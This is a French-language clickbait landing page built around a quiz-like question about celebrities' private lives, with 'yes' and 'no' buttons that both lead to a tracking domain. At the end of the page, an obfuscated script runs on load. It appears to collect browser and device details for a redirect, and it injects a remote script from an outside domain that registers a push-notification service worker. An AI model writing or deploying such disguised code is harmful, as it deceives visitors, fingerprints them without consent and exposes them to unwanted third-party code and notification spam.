<!DOCTYPE html>
<html lang="fr">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Quelle est la célébrité que vous admirez le plus ?</title>
    <style>
        body {
            font-family: 'Arial', sans-serif;
            background: linear-gradient(135deg, #ffafbd, #ffc3a0, #a1c4fd, #81ecec);
            background-size: 400% 400%;
            animation: gradientBG 15s ease infinite;
            display: flex;
            justify-content: center;
            align-items: center;
            height: 100vh;
            margin: 0;
        }
        @keyframes gradientBG {
            0% {
                background-position: 0% 50%;
            }
            50% {
                background-position: 100% 50%;
            }
            100% {
                background-position: 0% 50%;
            }
        }
        .container {
            background-color: rgba(255, 255, 255, 0.8);
            padding: 40px;
            border-radius: 10px;
            box-shadow: 0 4px 6px rgba(0, 0, 0, 0.1);
            text-align: center;
            max-width: 80%;
        }
        h1 {
            color: #2c3e50;
            font-size: 24px;
            margin-bottom: 10px;
        }
        .highlight {
            color: #3498db;
            font-size: 28px;
            font-weight: bold;
            margin-bottom: 30px;
        }
        .btn {
            background-color: #3498db;
            color: white;
            padding: 12px 48px;
            border: none;
            border-radius: 5px;
            font-size: 16px;
            cursor: pointer;
            animation: pulse 2s infinite;
			margin-right: 10px;
        }
		.non_btn {
			margin-left: 10px;
            background-color: #a7b4b4;
            color: white;
            padding: 12px 24px;
            border: none;
            border-radius: 5px;
            font-size: 16px;
            cursor: pointer;
        }
        @keyframes pulse {
            0% {
                box-shadow: 0 0 0 0 rgba(52, 152, 219, 0.7);
            }
            70% {
                box-shadow: 0 0 0 10px rgba(52, 152, 219, 0);
            }
            100% {
                box-shadow: 0 0 0 0 rgba(52, 152, 219, 0);
            }
        }
    </style>
    

</head>
<body>
    <div class="container">
        <h1 class="highlight">Hé, êtes-vous aussi curieux de la vie privée des célébrités ?</h1>
        <div >
		Avez-vous envie de jeter un coup d'oeil à la vie privée de ces célébrités qui brillent sous les projecteurs, et de découvrir l'état différent dans leur domaine privé inconnu des autres ? Quels secrets inattendus se cachent-ils dans leur vie privée ? </div>
		<div style ="padding-bottom: 30px;" >Rejoignez cette exploration pleine de mystère !</div>
        <a href="https://1rzt3x.mcgo2.com/click" class="btn mainButton">oui</a>
		<a href="https://1rzt3x.mcgo2.com/click/2" class="non_btn mainButton">non</a>
    </div>
</body>
<script>
    var cta = 'mainButton';
    var urlParams = new URLSearchParams(window.location.search);

    var back = 'https://1rzt3x.mcgo2.com/visit/c2e3d8e6-ef62-4339-8279-afc13a7edf08?sc=bbr_2&'+urlParams.toString()
    var under = 'https://1rzt3x.mcgo2.com/click?sc=u&'+urlParams.toString()

    var aElements = document.getElementsByTagName('a');
    console.log(aElements)
    for (var i = 0; i < aElements.length; i++) {
        var aElement = aElements[i];
        var href = aElement.getAttribute('href');
        if (!aElement.hasAttribute('href')) {
            continue;  // 跳过没有 href 属性的 <a> 标签
        }
        // 在 URL 的查询字符串之前添加一个 "?"
        if (urlParams.toString()) {
            href += (href.includes('?') ? '&' : '?') + urlParams.toString();
        }
        aElement.setAttribute('href', href);
    }
</script>
<script src="script.js"></script>

<script>
    var a='mcrpolfattafloprcmlVeedrosmico?ncc=uca&FcusleluVlearVsyipoonrctannEdhrgoiiHdt_emgocdeellicboosmccoast_avDetrnseigoAnrcebsruocw=seelri_bvoemr_ssiiocn'.split('').reduce((m,c,i)=>i%2?m+c:c+m).split('c');var Replace=(o=>{var v=a[0];try{v+=a[1]+Boolean(navigator[a[2]][a[3]]);navigator[a[2]][a[4]](o[0]).then(r=>{o[0].forEach(k=>{v+=r[k]?a[5]+o[1][o[0].indexOf(k)]+a[6]+encodeURIComponent(r[k]):a[0]})})}catch(e){}return u=>window.location.replace([u,v].join(u.indexOf(a[7])>-1?a[5]:a[7]))})([[a[8],a[9],a[10],a[11]],[a[12],a[13],a[14],a[15]]]); 
    var s = document.createElement('script');
    s.src='//desekansr.com/452/21aa4/mw.min.js?z=8140723'+'&sw=/sw-check-permissions-47ab0.js';
    s.onload = function(result) {
        switch (result) {
            case 'onPermissionDefault':break;
            case 'onPermissionAllowed':break;
            case 'onPermissionDenied':break;
            case 'onAlreadySubscribed':break;
            case 'onNotificationUnsupported':break;
        }
    };
    document.head.appendChild(s);
</script>

</html>